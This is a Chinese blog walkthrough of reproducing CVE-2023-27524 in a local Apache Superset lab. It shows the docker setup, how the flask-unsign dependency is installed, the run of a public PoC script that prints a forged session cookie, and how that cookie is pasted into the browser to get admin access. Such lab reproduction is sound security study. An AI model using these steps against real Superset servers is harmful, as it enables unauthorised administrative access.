当前位置: 首页 > article >正文

ApacheSuperset CVE-2023-27524

article 2025/8/31 1:09:03

前言:CVE-2023-27524 是一种远程代码执行漏洞,攻击者通过该漏洞可在受影响系统上执行任意代码,从而获得未授权访问权

CVE-2023-27524 GitHubhttps://github.com/horizon3ai/CVE-2023-27524

任务一 代理 | 拉取镜像

vi /etc/proxychains4.conf
//最下面修改真机IP端口

 

 

docker compose up -d
docker ps
//拉取成功后查看8088就是服务器端口

 任务二  python 问题解决

python3 CVE-2023-27524.py --url 192.168.247.139:8088 --id 1 --validate
//发现缺少 ‘flask_unsign’

python3 -m venv myenv
source myenv/bin/activate
//创建并激活一个虚拟环境
//安装 flask-unsign
proxychains4 pip install flask-unsign

任务三 生成cookie

python3 CVE-2023-27524.py --url 192.168.247.139:8088 --id 1 --validate
//下面这样就是安装成功了【eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.aEAshA.TmTRYFed6TPxFmeOmLRrQAXX3vc】

任务四 替换cookie 

//随便下载一个cookie的小插件 我用的是cookieManage

//替换进去保存,刷新一下就进管理界面了

 

任务五 实验结束 

http://www.lryc.cn/news/2399239.html

相关文章:

  • Windows Server部署Vue3+Spring Boot项目
  • malloc 是如何分配内存的?——C 语言内存分配详解
  • Opencl
  • 如何在 HTML 中添加按钮
  • 【优秀三方库研读】quill 开源库中的命名空间为什么要用宏封装
  • AlphaFold3运行错误及解决方法(1)
  • Linux--进程的程序替换
  • 调教 DeepSeek - 输出精致的 HTML MARKDOWN
  • 【笔记】Windows系统部署suna基于 MSYS2的Poetry 虚拟环境backedn后端包编译失败处理
  • GQA(Grouped Query Attention):分组注意力机制的原理与实践《一》
  • 【深度学习优化算法】02:凸性
  • JAVA国际版一对一视频交友视频聊天系统源码支持H5+APP
  • 策略公开了:年化494%,夏普比率5.86,最大回撤7% | 大模型查询akshare,附代码
  • 【C++】string类的模拟实现(详解)
  • 业界宽松内存模型的不统一而导致的软件问题, gcc, linux kernel, JVM
  • 多模态大语言模型arxiv论文略读(101)
  • 量化Quantization初步之--带量化(QAT)的XOR异或pyTorch版250501
  • Linux Maven Install
  • #Java篇:学习node后端之sql常用操作
  • 电网“逆流”怎么办?如何实现分布式光伏发电全部自发自用?
  • 如何查看电脑电池性能
  • kubernetes》》k8s》》kubectl proxy 命令后面加一个
  • 深入理解Linux系统进程切换
  • 网络安全运维实训室建设方案
  • DBeaver 连接mysql报错:CLIENT_PLUGIN_AUTH is required
  • 联通专线赋能,亿林网络裸金属服务器:中小企业 IT 架构升级优选方案
  • Web3时代的数据保护挑战与应对策略
  • Qwen3与MCP协议:重塑大气科学的智能研究范式
  • CppCon 2015 学习:Benchmarking C++ Code
  • URL 结构说明+路由(接口)的认识